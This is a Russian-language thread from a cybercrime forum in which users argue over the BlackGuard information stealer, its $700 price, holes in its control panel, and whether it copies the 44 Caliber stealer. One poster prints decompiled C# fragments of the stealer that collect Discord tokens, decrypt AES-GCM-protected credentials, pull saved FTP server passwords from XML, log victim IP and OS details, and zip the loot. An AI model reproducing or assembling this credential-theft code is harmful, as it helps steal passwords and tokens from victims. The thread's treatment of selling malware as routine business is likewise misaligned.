• XSS.stack #1 – первый литературный журнал от юзеров форума

Техническое обсуждение стилера BlackGuard

Пожалуйста, обратите внимание, что пользователь заблокирован
давай без этого я как нибудь сам разберусь что мне делать
Ну в этом вся твоя проблема, ты не умеешь слушать.

Шарп захватил мир
Ну я уже говорил тут ни один раз, если дотнеты уметь готовить, то они збс. Там есть много неочевидных сначала вещей, которыми можно аверов удивить.

лол я понял тебя просто жаба душит
Мне просто жалко людей, которые за 700$ покупают себе кривой софт, костыли и дыры в панели.Стоил бы твой софт 500р, вопросов бы никто не имел)

Ну я уже говорил тут ни один раз, если дотнеты уметь готовить, то они збс. Там есть много неочевидных сначала вещей, которыми можно аверов удивить.
Еще пока чистым с можно удивить, шарп разумется да тоже. Фантазия братик, есть же

Мне просто жалко людей, которые за 700$ покупают себе кривой софт, костыли и дыры в панели.Стоил бы твой софт 500р, вопросов бы никто не имел)
за 700$ они покупают не просто панель и билд а пожизненную лицензию на использование моего софта
чистка, обновление и так далее для них это все бесплатно и ни с одного покупателя я доп платежи не требовал никогда
сервак если блокают то бесплатно делается ребилд на новую панель

Последнее редактирование:
Вынес сообщения в отдельную тему, в соответствующий раздел (техническое обсуждение). Тут можно дальше обсудить.
спасибо

c0d3r_0f_shr0d13ng3r читал статью со слезами на глазах от смеха и от боли xD говнокод это вроде как не страшно если он работает и безопасен.
но вот залив шела в панель это просто браво. хуже только найти фтп сервер с кредами захардкоженными.

дополнительный файлик htaccess который надо было переименовать в .htaccess
А в чем проблема сразу создать .htaccess и не мучать себя и клиентов лишними телодвижениями? А если у меня вообще будет не Apache (который как раз таки и работает с этим файлом, другие вебсерверы срали на него с высоты колокольной башни), а nginx или IIS (не юзаю его, просто поставил в качестве примера)? Получается что каждый сможет залезть в мою папку с логами:/
далее идем всем клиентам которые сами просят поставить панель
Я конечно не видел инструкцию по установке (если она вообще существует), или же если ты сам настраиваешь это "чудо" своим клиентам, но панель и логи грузились от рута... Рукалицо, ибо на безопастность клиентов ты тоже чихать хотел.

Про панель (простите, итальянскую пасту) я промолчу...

Это же форк 44 Caliber

Его же лоадер

И гитхаб с "наработками"

А в чем проблема сразу создать .htaccess и не мучать себя и клиентов лишними телодвижениями? А если у меня вообще будет не Apache (который как раз таки и работает с этим файлом, другие вебсерверы срали на него с высоты колокольной башни), а nginx или IIS (не юзаю его, просто поставил в качестве примера)? Получается что каждый сможет залезть в мою папку с логами:/

Я конечно не видел инструкцию по установке (если она вообще существует), или же если ты сам настраиваешь это "чудо" своим клиентам, но панель и логи грузились от рута... Рукалицо, ибо на безопастность клиентов ты тоже чихать хотел.

Про панель (простите, итальянскую пасту) я промолчу...
если клиенты сами устанавливают то скидываю им инструкцию где подробно расписываю что куда

это всего лишь слова не более я даже внимания на этом свое не акцентрирую мне глубоко наплевать на мнение какого то чудо реверсера который посчитал что это форк 44 калибра)))

это всего лишь слова не более я даже внимания на этом свое не акцентрирую мне глубоко наплевать на мнение какого то чудо реверсера который посчитал что это форк 44 калибра)))
black1.png
black2.png

black3.png
black4.png

Ты заврался, остановись пока не поздно

подробно расписываю что куда
Еще раз, для тупых и альтернативно тупых:

А в чем проблема сразу создать .htaccess и не мучать себя и клиентов лишними телодвижениями? А если у меня вообще будет не Apache (который как раз таки и работает с этим файлом, другие вебсерверы срали на него с высоты колокольной башни), а nginx или IIS (не юзаю его, просто поставил в качестве примера)?

мне глубоко наплевать на мнение какого то чудо реверсера который посчитал что это форк 44 калибра
На самом деле очень много совпадений с кодом из Калибра, куда не глянь. Это не то, чтобы прям плохо, но отрицать, что очень большое количество кода было взято из Калибра попросту бессмысленно. Ну хоть не из СтормКитти, и то хорошо))

C#:
// Token: 0x060001B0 RID: 432 RVA: 0x00007220 File Offset: 0x00005420
    private static string smethod_0(gefuirgiofw gefuirgiofw_0)
    {
        return string.Concat(new string[]
        {
            "Hostname: ",
            gefuirgiofw_0.nLru,
            "\nUsername: ",
            gefuirgiofw_0.String_0,
            "\nPassword: ",
            gefuirgiofw_0.dalevocomo,
            "\n\n"
        });
    }

C#:
// Token: 0x060001B2 RID: 434 RVA: 0x00003742 File Offset: 0x00001942
    private static string smethod_2(Struct1 struct1_0)
    {
        return string.Format("### {0} ### ({1}) {2}\n", struct1_0.method_2(), struct1_0.method_0(), struct1_0.method_4());
    }

C#:
// Token: 0x06000049 RID: 73 RVA: 0x00005854 File Offset: 0x00003A54
    public static void smethod_0()
    {
        string nika = metadol.nika;
        string contents = string.Concat(new string[]
        {
            "\n ==================================================\n ==================  BG****_v3.5 ==============\n ==================================================\n ==================================================\n IP: ",
            Class1.string_0,
            "\n ==================================================\n Country: ",
            Class19.string_4,
            "\n ==================================================\n ID: ",
            Class18.smethod_0(),
            "\n ==================================================\n OS: ",
            Class19.string_3,
            "\n ==================================================\n Log Date: ",
            metadol.redilka,
            "\n =================================================="
        });
        File.WriteAllText(nika + "\\\\Information.txt", contents);
    }

C#:
public byte[] method_0(byte[] byte_0, byte[] byte_1, byte[] byte_2, byte[] byte_3, byte[] byte_4)
    {
        IntPtr intPtr = this.method_2(judicony.BCRYPT_AES_ALGORITHM, judicony.MS_PRIMITIVE_PROVIDER, judicony.BCRYPT_CHAIN_MODE_GCM);
        IntPtr intPtr2;
        IntPtr hglobal = this.method_3(intPtr, byte_0, out intPtr2);
        judicony.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO bcrypt_AUTHENTICATED_CIPHER_MODE_INFO = new judicony.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(byte_1, byte_2, byte_4);
        byte[] array2;
        using (bcrypt_AUTHENTICATED_CIPHER_MODE_INFO)
        {
            byte[] array = new byte[this.method_1(intPtr)];
            int num = 0;
            uint num2 = judicony.BCryptDecrypt(intPtr2, byte_3, byte_3.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, null, 0, ref num, 0);
            if (num2 != 0U)
            {
                throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() (get size) failed with status code: {0}", num2));
            }
            array2 = new byte[num];
            num2 = judicony.BCryptDecrypt(intPtr2, byte_3, byte_3.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, array2, array2.Length, ref num, 0);
            if (num2 == judicony.STATUS_AUTH_TAG_MISMATCH)
            {
                throw new CryptographicException("BCrypt.BCryptDecrypt(): authentication tag mismatch");
            }
            if (num2 != 0U)
            {
                throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() failed with status code:{0}", num2));
            }
        }
        judicony.BCryptDestroyKey(intPtr2);
        Marshal.FreeHGlobal(hglobal);
        judicony.BCryptCloseAlgorithmProvider(intPtr, 0U);
        return array2;
    }

C#:
using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866")))
        {
            zipFile.ParallelDeflateThreshold = -1L;
            zipFile.UseZip64WhenSaving = 2;
            zipFile.CompressionLevel = 0;
            zipFile.AddDirectory(metadol.nika);
            zipFile.Save(text);
        }

C#:
// Token: 0x0600021D RID: 541 RVA: 0x00008380 File Offset: 0x00006580
    public static void smethod_1()
    {
        try
        {
            string text = metadol.nika + "\\\\Discord";
            string[] array = Class20.smethod_2();
            if (array.Length != 0)
            {
                Directory.CreateDirectory(text);
                foreach (string str in array)
                {
                    File.AppendAllText(text + "\\\\Tokens.txt", str + "\n");
                }
            }
            Class20.MxHbaqRmoa();
        }
        catch (Exception value)
        {
            Console.WriteLine(value);
        }
    }

C#:
// Token: 0x0600023D RID: 573 RVA: 0x00008968 File Offset: 0x00006B68
    public static void smethod_2(string string_1, string string_2, string string_3 = "RecentServers", string string_4 = "Server")
    {
        checked
        {
            try
            {
                if (File.Exists(string_1))
                {
                    XmlDocument xmlDocument = new XmlDocument();
                    xmlDocument.Load(string_1);
                    foreach (object obj in ((XmlElement)xmlDocument.GetElementsByTagName(string_3)[0]).GetElementsByTagName(string_4))
                    {
                        XmlElement xmlElement = (XmlElement)obj;
                        string innerText = xmlElement.GetElementsByTagName("Host")[0].InnerText;
                        string innerText2 = xmlElement.GetElementsByTagName("Port")[0].InnerText;
                        string innerText3 = xmlElement.GetElementsByTagName("User")[0].InnerText;
                        string @string = Encoding.UTF8.GetString(Convert.FromBase64String(xmlElement.GetElementsByTagName("Pass")[0].InnerText));
                        if (string.IsNullOrEmpty(innerText) || string.IsNullOrEmpty(innerText2) || string.IsNullOrEmpty(innerText3) || string.IsNullOrEmpty(@string))
                        {
                            break;
                        }
                        Class21.stringBuilder_0.AppendLine("link: " + innerText);
                        Class21.stringBuilder_0.AppendLine("Port: " + innerText2);
                        Class21.stringBuilder_0.AppendLine("Uname: " + innerText3);
                        Class21.stringBuilder_0.AppendLine("pws: " + @string + "\r\n");
                        Class5.int_8++;
                    }
                    if (Class21.stringBuilder_0.Length > 0)
                    {
                        File.AppendAllText(string_2, Class21.stringBuilder_0.ToString());
                    }
                }
            }
            catch (Exception value)
            {
                Console.WriteLine(value);
            }
        }
    }

...ну и так можно продолжать очень долго, по сути весь функционал по стиллингу всякого разного был застиллен позаимствован из Калибра. Как бы форк это или нет, можно рассусоливать и спорить об этом, но факты "заимствования" на лицо.

Посмотреть вложение 35639Посмотреть вложение 35640
Посмотреть вложение 35641Посмотреть вложение 35642
Ты заврался, остановись пока не поздно
ты шары разуй то что ты на скрине кидаешь это вообще никак не относится к новой версии моего софта из этого следует что мне глубоко начхать на твои высеры веришь нет
у меня нету отстука в телегу от слова вообще есть только через панель отправка текстовых уведомлений не более лол
а то что в стилаке используется bcrypt и что из этого? bcrypt этот вообще никак не относится к стиллинку куков и пути похожие как во многих стилаках вы ебанулись совсем чтоли? разве запрещено использовать пути или что больше комментариев не будет.

разве запрещено использовать пути или что больше комментариев не будет
Да все разрешено, в том числе и пиздить код из оупенсорса и продавать его (если совесть позволяет себе это разрешить). Но ты отрицаешь, что это форк Калибра, а я говорю, что отрицать это бессмысленно, очень много кода оттуда совпадает с семплом твоего продукта.

Панель хакфора от эвриал ещё добавьте)

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх